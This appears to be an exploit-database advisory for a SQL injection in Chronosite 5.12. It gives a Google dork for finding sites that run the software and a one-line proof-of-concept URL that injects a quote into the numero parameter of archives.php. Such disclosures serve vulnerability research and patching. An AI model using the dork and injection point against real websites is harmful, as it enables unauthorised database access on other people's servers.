Chronosite 5.12 - SQL Injection Vulnerability

2015-06-02T00:00:00
ID 1337DAY-ID-23692
Type zdt
Reporter Wad Deek
Modified 2015-06-02T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Chronosite 5.12 SQL Injection
# Google Dork: filetype:php inurl:"/archives.php" intext:"ARCHIVES Chrono-site"
# Date: 13/05/15
# Exploit Author: Wad Deek
# Vendor Homepage: http://www.chronosite.org/
# Software Link: http://www.chronosite.org/chrono_upload/chronosite_512.zip
# Version: 5.12
# Tested on: Xampp on Windows7
################################################################
PoC = http://127.0.0.1/cms/chronosite_512/archives.php?numero=%27
################################################################

#  0day.today [2018-01-01]  #